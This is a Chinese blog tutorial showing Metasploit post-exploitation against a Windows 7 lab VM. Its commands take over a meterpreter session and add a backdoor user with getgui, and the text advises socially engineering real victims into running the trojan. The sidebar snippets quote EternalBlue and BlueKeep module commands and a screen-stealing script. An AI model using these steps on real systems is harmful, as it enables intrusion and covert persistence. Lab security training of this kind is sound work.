网络安全工程师演示:黑客是如何进行Windows7计算机攻防实战?(准备篇)

最新推荐文章于 2021-04-26 15:32:50 发布
最新推荐文章于 2021-04-26 15:32:50 发布
阅读量332 收藏
点赞数
分类专栏: 科技 黑客 IT技术 文章标签: 网络安全 计算机网络 信息安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/109689274
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 查看攻击者主机(Kali Linux)控制台的会话信息,如下图所示。
PS:这个界面是拿下目标主机后的Metasploit(msf)会话窗口,如何拿下目标主机请查看上文。
命令:sessions
在这里插入图片描述

3.2 在受害者主机执行生成的木马文件,使其返回连接到攻击者主机,建立会话,如下图所示。(实验环境下我们可以操纵受害者主机双击运行木马文件,实际渗透测试过程中则需要你利用社会工程学的有关知识诱导受害者管理员执行木马文件)
在这里插入图片描述

3.3 在受害者主机执行相应的木马文件之后,在攻击者主机查看是否已经建立起来了相应的会话信息,如下图所示。
命令:sessions
在这里插入图片描述

3.4 根据控制台产生的会话信息切换到你想切换的会话中,如下图所示。
命令:sessions -i 会话ID
例子:sessions -i 5(连接到会话ID为5的会话)
在这里插入图片描述

3.5 运行相应的脚本文件在受害者主机建立用户,如下图所示。
命令:run getgui -u 用户名 -p 密码
例子:run getgui -u hacker -p 123456
在这里插入图片描述

3.6 进入受害者主机,利用命令查看刚在在攻击者主机建立的用户是否建立成功,如下图所示。
命令:Win+R
命令:cmd
命令:user
在这里插入图片描述

3.7 查看受害者主机是否开启了远程桌面服务,查看方法如下图所示。
步骤:Windows/计算机/系统属性/高级系统设置/远程
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可见,该受害者主机的远程桌面服务是没有打开的,接下来我们一起来学习一下如何在攻击者主机终端利用脚本远程打开受害者主机的远程桌面服务,敬请期待下章节!
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多黑客渗透技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一次实战环境横向内网渗透记录
weixin_44284303的博客
07-08 1464
渗透背景: 某反病毒公司即将推出一种新的反病毒产品,已知该公司员工Molos的电脑中有该反病毒产品的相关信息,目标是将该文件取出并不被发现 已有条件: (1)你已经进入了内网中 (2)四个已知ip: 10.21.48.70 10.21.48.72 10.21.48.73 10.21.48.75 (3)攻击机kali:10.21.48.58 /内网渗透过程**/ 1.信息收集 通过nmap进行信息收...
网络安全工程师演示黑客是如何进行Windows7计算机攻防实战?(实战)
Kali与编程
11-14 607
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
网络安全自学黑客攻防实战编程看这就够了(内含实战
MachineGunJoe666
04-26 1596
长期以来,由于诸多方面的因素,“黑客”这个字眼变得十分敏感。不同的人群对黑客也存在不同的理解,甚至没有人愿意承认自己是黑客。有些人认为,黑客是一群狂热的技术爱好者,他们无限度地追求技术的完美:有些人认为,黑客只是一群拥有技术,但思想简单的毛头小伙子;还有些人认为黑客是不应该存在的,他们是网络的破坏者。这里,我们没有必要对这个问题争论不休,也无须为黑客加上一个标准的定义,但从客观存在的事实来看,黑客这类群体往往存在以下共同点。 (1)强烈的技术渴望与完美主义:驱动他们成长的是对技术的无限渴望,获得技术的提高
网络安全工程师演示黑客是如何进行内网计算机攻防的?【四】
Kali与编程
11-20 286
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
渗透实战(周一):VMmare Fusion安装Kali Linux和win7虚拟机
weixin_30287169的博客
11-12 452
高配笔记本电脑i5/8G/265G 、VMware Fusion 、Kali Linux镜像 、Win7镜像 第一:下载软件 1.如果你是苹果系统,建议下载最新VMware Fusion 11.0.0 中文版虚拟机 (点此下载),里面包含密钥,亲测有用。 另外,如果你是Win系统,建议下载WMware Workstation 15 pro 虚拟...
彻底研究:黑客编程技术揭秘与攻防实战
04-01
彻底研究:黑客编程技术揭秘与攻防实战
黑客攻防技术宝典:Web实战(第2版)1
08-03
黑客攻防技术宝典:Web实战(第2版)》是一本专注于Web应用程序安全的实战指南,由Dafydd Stuttard和Marcus Pinto撰写,由石华耀和傅志红翻译。该书深入浅出地探讨了Web应用程序的安全风险和攻防策略,适合网络...
毕业:计算机网络安全概述及防范策略(完整版)资料.doc
最新发布
11-30
物理安全策略可以通过控制物理访问来保护计算机网络系统,访问控制策略可以通过控制用户的访问权限来保护计算机网络系统,信息加密策略可以通过加密信息来保护计算机网络系统,网络安全管理策略可以通过管理网络系统...
白帽子黑客网络安全工程师带你:远程桌面漏洞利用与Windows7计算机攻防实战
Kali与编程
10-12 401
一、课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 二、战略安排 2.1 打开Metasploit渗透框架,如下如所示。 命令:msfconsole 2.2 检索有关远程桌面的已知漏洞,如下图所示。 命令:search 0708 2.3 使用检索到的关于远程桌面的漏洞利用模块,如下图所示。 命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_r
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
利用msfvenom渗透win7
CODING...
11-12 1万+
msfvenom是kali linux下一个可以产生自定义payload的程序,接下来我们利用msfvenom产生一个新的win7下的计算器后门程序,利用windows/meterpreter/reverse_tcp来对目标靶机windows7进行控制。
渗透测试实战7——超级玛丽靶机入侵
浅浅的博客
05-10 1224
一、实验环境 攻击机(Kali):192.168.247.171 靶机(Node):192.168.247.170 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 目标靶机开放8180端口和22端口 3、端口详细信息 可以看到该靶机开放了2个端口,分别是8180端口和22端口,我们以8180端口开始。 (二)端口探测 8180端口 —— http...
Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机
monster663的博客
02-06 4671
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 一、Metasploit(MSF)简介 Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。 Metasploit主要包含以下几个模块: 1.辅助模块(Aux
kali 入侵win7并实现远程关机
weixin_40264215的博客
08-16 1万+
我所做的实验在虚拟机上执行,一台win7一台kali,很正常的配备。 启动metasploit 输入 use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/meterpreter/reverse_tcp set RHOST 192.168.0.254(win7 ip) ...
Python黑客攻防(一)屏幕窃取
qq_43681532的博客
07-05 3958
注:本文章仅供学习交流,请勿用于非法用途 ,否则后果自负。转载自微信公众号:黑客帮,大神勿喷。 原理:使用SMTP协议及截图函数完成屏幕截取并自动发送到指定邮箱。 步骤: 1.邮箱开启SMTP服务,记住授权码。 登录网页版邮箱->设置->账户,找到SMTP服务将其开启,记住授权码。 2.代码解析。 截图函数 time.sleep()表示休眠这里为5,表示代码暂停5秒,该函数每5秒就截一张图在D盘中覆盖保存。 #截图 def imG(): i = 1 while True:
实战系列】intel 8代CPU I7 8700完美装WIN7系统
热门推荐
weixin_43707156的博客
11-15 12万+
本系列教程是本人维修实战过程中的经验截图,适合维修装机人员学习使用。截图步骤清晰易懂,一步一图,小白也能学会。装系统之前首先你得有一个能装系统的U盘启动盘,怎么制作U盘启动盘,请看之前的教程——最简单的U盘启动盘制作方法。本系列教程都用U盘装系统,制作U盘启动盘的PE是用IT天空的优启通,适合电脑店维修装机老师傅用,万能驱动也是用的IT天空最新的万能驱动助理7,配合优启通,没有任何广告,而且能在P...
利用木马对windows进行渗透
xiaopan233的博客
09-23 2300
本实验在虚拟机环境下进行!!! 准备: Kali            ip: 192.168.0.107 Win7带office2010           ip:192.168.0.108   我们先启动msfconsole并使用模块 use exploit/windows/fileformat/office_word_hta 查看目标 show targets 可以看到目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值